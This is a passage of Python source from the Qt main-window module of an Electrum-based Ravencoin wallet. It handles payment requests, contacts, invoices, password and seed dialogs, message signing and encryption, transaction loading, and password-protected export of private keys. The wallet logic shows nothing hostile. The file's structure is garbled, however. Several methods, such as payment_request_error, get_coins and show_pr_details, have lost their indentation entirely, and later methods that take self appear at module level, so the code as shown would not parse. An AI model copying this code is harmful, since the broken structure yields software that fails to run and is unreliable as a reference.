        """Remove invoice *key* from storage and refresh the invoice list."""
        self.invoices.remove(key)
        self.invoice_list.update()
    def payment_request_ok(self):
        """Populate the send tab from a successfully fetched/verified
        payment request; bail out if it was already paid."""
        pr = self.payment_request
        if not pr:
            return
        key = self.invoices.add(pr)
        status = self.invoices.get_status(key)
        self.invoice_list.update()
        if status == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Green = still valid, red/expired style otherwise.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
    def pay_to_URI(self, URI):
        """Fill the send tab from a raven: URI; BIP70-style URIs trigger an
        async payment-request fetch instead (result arrives via on_pr)."""
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidRavencoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        # 'r' (request URL) or a signed name means a payment request will be
        # fetched asynchronously; just freeze the UI and wait for on_pr.
        if r or (name and sig):
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")
    def do_clear(self):
        """Reset the send tab to its default (empty, unfrozen) state."""
        self.max_button.setChecked(False)
        self.not_enough_funds = False
        self.payment_request = None
        self.payto_e.is_pr = False
        for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
                  self.fee_e, self.feerate_e]:
            e.setText('')
            e.setFrozen(False)
        # Fee control falls back to the slider with the configured rate.
        self.fee_slider.activate()
        self.feerate_e.setAmount(self.config.fee_per_byte())
        self.size_e.setAmount(0)
        self.feerounding_icon.setVisible(False)
        self.set_pay_from([])
        self.tx_external_keypairs = {}
        self.update_status()
        run_hook('do_clear', self)
    def set_frozen_state_of_addresses(self, addrs, freeze: bool):
        """Freeze/unfreeze *addrs* in the wallet, then refresh affected views."""
        self.wallet.set_frozen_state_of_addresses(addrs, freeze)
        self.address_list.update()
        self.utxo_list.update()
        self.update_fee()
    def set_frozen_state_of_coins(self, utxos, freeze: bool):
        """Freeze/unfreeze individual *utxos*, then refresh affected views."""
        self.wallet.set_frozen_state_of_coins(utxos, freeze)
        self.utxo_list.update()
        self.update_fee()
    def create_list_tab(self, l, toolbar=None):
        """Wrap list widget *l* (plus an optional toolbar) in a tab page.

        The widget is also exposed as `searchable_list` so the global
        search box (do_search) can filter it.
        """
        w = QWidget()
        w.searchable_list = l
        vbox = QVBoxLayout()
        w.setLayout(vbox)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.setSpacing(0)
        if toolbar:
            vbox.addLayout(toolbar)
        vbox.addWidget(l)
        return w
    def create_assets_tab(self):
        """Build the Assets tab around an AssetList with its toolbar."""
        from .asset_list import AssetList
        self.asset_list = l = AssetList(self)
        toolbar = l.create_toolbar(self.config)
        return self.create_list_tab(l, toolbar)
    def create_addresses_tab(self):
        """Build the Addresses tab; toolbar visibility follows config."""
        from .address_list import AddressList
        self.address_list = l = AddressList(self)
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = self.config.get('show_toolbar_addresses', False)
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)
    def create_utxo_tab(self):
        """Build the Coins (UTXO) tab."""
        from .utxo_list import UTXOList
        self.utxo_list = l = UTXOList(self)
        return self.create_list_tab(l)
    def create_contacts_tab(self):
        """Build the Contacts tab."""
        from .contact_list import ContactList
        self.contact_list = l = ContactList(self)
        return self.create_list_tab(l)
    def remove_address(self, addr):
        """Delete *addr* from the wallet after user confirmation."""
        if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
            self.wallet.delete_address(addr)
            self.need_update.set()  # history, addresses, coins
            self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
    def spend_coins(self, coins):
        """Spend exactly *coins*: select them, open the send tab, update fee."""
        self.set_pay_from(coins)
        self.show_send_tab()
        self.update_fee()
    def paytomany(self):
        """Switch the payto field into multi-recipient mode and explain it."""
        self.show_send_tab()
        self.payto_e.paytomany()
        msg = '\n'.join([
            _('Enter a list of outputs in the \'Pay to\' field.'),
            _('One output per line.'),
            _('Format: address, amount'),
            _('You may load a CSV file using the file icon.')
        ])
        self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
    def set_contact(self, label, address):
        """Add/replace the contact for *address*; returns True on success."""
        if not is_address(address):
            self.show_error(_('Invalid Address'))
            self.contact_list.update()  # Displays original unchanged value
            return False
        self.contacts[address] = ('address', label)
        self.contact_list.update()
        self.history_list.update()
        self.update_completions()
        return True
    def delete_contacts(self, labels):
        """Remove the given contact keys after a single confirmation."""
        if not self.question(_("Remove {} from your list of contacts?")
                             .format(" + ".join(labels))):
            return
        for label in labels:
            self.contacts.pop(label)
        self.history_list.update()
        self.contact_list.update()
        self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
    def create_console_tab(self):
        """Build the interactive Python console tab."""
        from .console import Console
        self.console = console = Console()
        return console
    def update_console(self):
        """(Re)populate the console namespace with wallet/network objects
        and wrap all public Commands methods as callables."""
        console = self.console
        console.history = self.config.get("console-history",[])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'ravencoin': ravencoin,
        })
        c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
        methods = {}
        # mkfunc is needed so each closure binds its own method name.
        def mkfunc(f, method):
            return lambda *args: f(method, args, self.password_dialog)
        for m in dir(c):
            if m[0]=='_' or m in ['network','wallet','config']: continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)
    def create_status_bar(self):
        """Assemble the bottom status bar: balance, status text, search box,
        update notifier, and password/preferences/seed/network buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setAlignment(Qt.AlignVCenter)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        self.status_label = QLabel("")
        self.status_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
        self.status_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addPermanentWidget(self.status_label)
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        # Hidden until an update is actually available.
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
    def update_lock_icon(self):
        """Show a locked/unlocked icon depending on wallet encryption."""
        icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
        self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
    def change_password_dialog(self):
        """Run the appropriate change-password flow (hardware vs software
        keystore) and update wallet encryption accordingly."""
        from electrum.storage import STO_EV_XPUB_PW
        if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
            # Hardware wallet: the storage password is derived from the
            # device, so only the encrypt-file choice is asked.
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(str(e))
                return
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()
            if not ok:
                return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
    def toggle_search(self):
        """Toggle the status-bar search box; clearing the filter on hide."""
        tab = self.tabs.currentWidget()
        #if hasattr(tab, 'searchable_list'):
        #    tab.searchable_list.toggle_toolbar()
        #return
        self.search_box.setHidden(not self.search_box.isHidden())
        if not self.search_box.isHidden():
            self.search_box.setFocus(1)
        else:
            self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
    def new_contact_dialog(self):
        """Ask for an address + name and store them as a contact."""
        d = WindowModalDialog(self, _("New Contact"))
        vbox = QVBoxLayout(d)
        vbox.addWidget(QLabel(_('New Contact') + ':'))
        grid = QGridLayout()
        line1 = QLineEdit()
        line1.setFixedWidth(32 * char_width_in_lineedit())
        line2 = QLineEdit()
        line2.setFixedWidth(32 * char_width_in_lineedit())
        grid.addWidget(QLabel(_("Address")), 1, 0)
        grid.addWidget(line1, 1, 1)
        grid.addWidget(QLabel(_("Name")), 2, 0)
        grid.addWidget(line2, 2, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if d.exec_():
            # set_contact(label, address) validates the address itself.
            self.set_contact(line2.text(), line1.text())
    def show_master_public_keys(self):
        """Show the 'Wallet Information' dialog: name, type, script type,
        seed availability, keystore type and master public key(s)."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(500, 100)
        mpk_list = self.wallet.get_master_public_keys()
        vbox = QVBoxLayout()
        wallet_type = self.wallet.storage.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('True') if self.wallet.has_seed() else _('False')
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        # A single keystore type is shown inline; multisig cosigner types
        # are shown per-key in the combobox labels below instead.
        if len(keystore_types) <= 1:
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        vbox.addLayout(grid)
        if self.wallet.is_deterministic():
            mpk_text = ShowQRTextEdit()
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            def show_mpk(index):
                mpk_text.setText(mpk_list[index])
                mpk_text.repaint()  # macOS hack for #4777
            # only show the combobox in case multiple accounts are available
            if len(mpk_list) > 1:
                def label(key):
                    if isinstance(self.wallet, Multisig_Wallet):
                        return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                    return ''
                labels = [label(i) for i in range(len(mpk_list))]
                on_click = lambda clayout: show_mpk(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            else:
                vbox.addWidget(QLabel(_("Master Public Key")))
            show_mpk(0)
            vbox.addWidget(mpk_text)
        vbox.addStretch(1)
        vbox.addLayout(Buttons(CloseButton(dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()
    def remove_wallet(self):
        """Ask for confirmation, then delete the wallet file (password-gated
        by the @protected _delete_wallet)."""
        if self.question('\n'.join([
                _('Delete wallet file?'),
                "%s"%self.wallet.storage.path,
                _('If your wallet contains funds, make sure you have saved its seed.')])):
            self._delete_wallet()
    @protected
    def _delete_wallet(self, password):
        """Delete this wallet's file via the daemon and close the window."""
        wallet_path = self.wallet.storage.path
        basename = os.path.basename(wallet_path)
        r = self.gui_object.daemon.delete_wallet(wallet_path)
        self.close()
        if r:
            self.show_error(_("Wallet removed: {}").format(basename))
        else:
            self.show_error(_("Wallet file not found: {}").format(basename))
    @protected
    def show_seed_dialog(self, password):
        """Display the wallet seed (and passphrase) after password entry."""
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        keystore = self.wallet.get_keystore()
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except BaseException as e:
            self.show_error(str(e))
            return
        from .seed_dialog import SeedDialog
        d = SeedDialog(self, seed, passphrase)
        d.exec_()
    def show_qrcode(self, data, title = _("QR code"), parent=None):
        """Show *data* rendered as a QR code in a modal dialog."""
        if not data:
            return
        d = QRDialog(data, parent or self, title)
        d.exec_()
    @protected
    def show_private_key(self, address, password):
        """Show the private key (and redeem script, if any) for *address*."""
        if not address:
            return
        try:
            pk, redeem_script = self.wallet.export_private_key(address, password)
        except Exception as e:
            self.logger.exception('')
            self.show_message(str(e))
            return
        xtype = ravencoin.deserialize_privkey(pk)[0]
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 150)
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Address") + ': ' + address))
        vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
        vbox.addWidget(QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text=pk)
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        if redeem_script:
            vbox.addWidget(QLabel(_("Redeem Script") + ':'))
            rds_e = ShowQRTextEdit(text=redeem_script)
            rds_e.addCopyButton(self.app)
            vbox.addWidget(rds_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
    @protected
    def do_sign(self, address, message, signature, password):
        """Sign *message* with *address*'s key; the arguments are the Qt
        input widgets, and the result is written into *signature*."""
        address = address.text().strip()
        message = message.toPlainText().strip()
        if not ravencoin.is_address(address):
            self.show_message(_('Invalid Ravencoin address.'))
            return
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        if not self.wallet.is_mine(address):
            self.show_message(_('Address not in wallet.'))
            return
        txin_type = self.wallet.get_txin_type(address)
        if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
            self.show_message(_('Cannot sign messages with this type of address:') + \
                              ' ' + txin_type + '\n\n' + self.msg_sign)
            return
        task = partial(self.wallet.sign_message, address, message, password)
        def show_signed_message(sig):
            try:
                signature.setText(base64.b64encode(sig).decode('ascii'))
            except RuntimeError:
                # (signature) wrapped C/C++ object has been deleted
                pass
        # Run signing on the wallet worker thread to keep the GUI responsive.
        self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
    def sign_verify_message(self, address=''):
        """Open the Sign/Verify Message dialog, optionally pre-filled with
        *address*."""
        d = WindowModalDialog(self, _('Sign/verify Message'))
        d.setMinimumSize(610, 290)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        address_e = QLineEdit()
        address_e.setText(address)
        layout.addWidget(QLabel(_('Address')), 2, 0)
        layout.addWidget(address_e, 2, 1)
        signature_e = QTextEdit()
        signature_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Signature')), 3, 0)
        layout.addWidget(signature_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Sign"))
        b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Verify"))
        b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
    @protected
    def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
        """Decrypt *encrypted_e*'s ciphertext with the key for *pubkey_e*
        and put the plaintext into *message_e* (widgets as arguments)."""
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        cyphertext = encrypted_e.toPlainText()
        task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
        def setText(text):
            try:
                message_e.setText(text.decode('utf-8'))
            except RuntimeError:
                # (message_e) wrapped C/C++ object has been deleted
                pass
        # Decrypt on the wallet worker thread to keep the GUI responsive.
        self.wallet.thread.add(task, on_success=setText)
    def do_encrypt(self, message_e, pubkey_e, encrypted_e):
        """ECIES-encrypt *message_e*'s text to the public key in *pubkey_e*
        and place the result into *encrypted_e* (widgets as arguments)."""
        message = message_e.toPlainText()
        message = message.encode('utf-8')
        try:
            public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
        except BaseException as e:
            self.logger.exception('Invalid Public key')
            self.show_warning(_('Invalid Public key'))
            return
        encrypted = public_key.encrypt_message(message)
        encrypted_e.setText(encrypted.decode('ascii'))
    def encrypt_message(self, address=''):
        """Open the Encrypt/Decrypt Message dialog; with *address* given,
        the public key field is pre-filled from the wallet."""
        d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
        d.setMinimumSize(610, 490)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        pubkey_e = QLineEdit()
        if address:
            pubkey = self.wallet.get_public_key(address)
            pubkey_e.setText(pubkey)
        layout.addWidget(QLabel(_('Public key')), 2, 0)
        layout.addWidget(pubkey_e, 2, 1)
        encrypted_e = QTextEdit()
        encrypted_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Encrypted')), 3, 0)
        layout.addWidget(encrypted_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Encrypt"))
        b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Decrypt"))
        b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
    def password_dialog(self, msg=None, parent=None):
        """Prompt for the wallet password; returns the entry or None."""
        from .password_dialog import PasswordDialog
        parent = parent or self
        d = PasswordDialog(parent, msg)
        return d.run()
    def tx_from_text(self, txt):
        """Parse *txt* into a Transaction; shows an error and returns None
        on failure."""
        from electrum.transaction import tx_from_str
        try:
            tx = tx_from_str(txt)
            return Transaction(tx)
        except BaseException as e:
            self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
            return
    def read_tx_from_qrcode(self):
        """Scan a QR code: either pay a raven: URI or load an offline tx."""
        from electrum import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(str(e))
            return
        if not data:
            return
        # if the user scanned a ravencoin URI
        if str(data).startswith("raven:"):
            self.pay_to_URI(data)
            return
        # else if the user scanned an offline signed tx
        try:
            # Raw transactions are QR-encoded in base43.
            data = bh2u(ravencoin.base_decode(data, length=None, base=43))
        except BaseException as e:
            self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
            return
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
    def do_process_from_text(self):
        """Prompt for a raw transaction string and display the parsed tx."""
        text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
        if not text:
            return
        tx = self.tx_from_text(text)
        if tx:
            self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
    def do_process_from_txid(self):
        """Prompt for a txid, fetch the raw tx from the network and show it."""
        from electrum import transaction
        txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
        if ok and txid:
            txid = str(txid).strip()
            try:
                raw_tx = self.network.run_from_another_thread(
                    self.network.get_transaction(txid, timeout=10))
            except Exception as e:
                self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
                return
            tx = transaction.Transaction(raw_tx)
            self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
    """Export all wallet private keys to a user-chosen CSV/JSON file.

    Keys are derived on a background thread (one per address) while the
    dialog shows progress; two Qt signals marshal updates back onto the
    GUI thread. The @protected decorator supplies the wallet password.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        # exporting one wallet's keys is not a valid backup of a multisig setup
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-rvn-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    b.setEnabled(False)  # enabled only once all keys are derived
    vbox.addLayout(Buttons(CancelButton(d), b))
    # shared state between the worker thread and the GUI-thread callbacks
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # background worker: derive one key per address, emit progress signal
        for addr in addresses:
            time.sleep(0.1)  # throttle so the GUI stays responsive
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)[0]
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI thread: render the finished list and allow export
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        nonlocal done
        nonlocal cancelled
        if not done:
            # dialog closed before the worker finished: stop it, detach signals
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        # user cancelled: flag the worker to stop
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write a mapping of address -> private key to *fileName*.

    Arguments:
        fileName: destination path (truncated/created).
        pklist: dict mapping address strings to WIF private key strings.
        is_csv: if True write two-column CSV (header "address,private_key",
            addresses right-padded to 34 chars); otherwise write indented JSON.
    Raises IOError/OSError on file-system failures (handled by callers).
    """
    # newline='' is required by the csv module when handing it a file object;
    # without it, Windows gets an extra blank line after every row.
    with open(fileName, "w+", newline='') as f:
        if is_csv:
            writer = csv.writer(f)
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                # %34s keeps the address column visually aligned
                writer.writerow(["%34s"%addr,pk])
        else:
            f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
    """Import wallet labels from a file via the shared metadata dialog."""
    def _assign(data):
        # copy every (key, label) pair into the wallet
        for name, label in data.items():
            self.wallet.set_label(name, label)
    def _import(path):
        # validation is currently a pass-through (TODO upstream)
        import_meta(path, lambda data: data, _assign)
    import_meta_gui(self, _('labels'), _import, lambda: self.need_update.set())
def do_export_labels(self):
    """Export wallet labels to a file via the shared metadata dialog."""
    import_target = self.wallet.labels
    export_meta_gui(self, _('labels'),
                    lambda filename: export_meta(import_target, filename))
def sweep_key_dialog(self):
    """Sweep funds controlled by externally-held private keys into this wallet.

    Prompts for WIF keys and a destination address, prepares spendable coins
    via sweep_preparations(), then pre-fills and freezes the Send tab with a
    max-value spend using the external keypairs.
    """
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
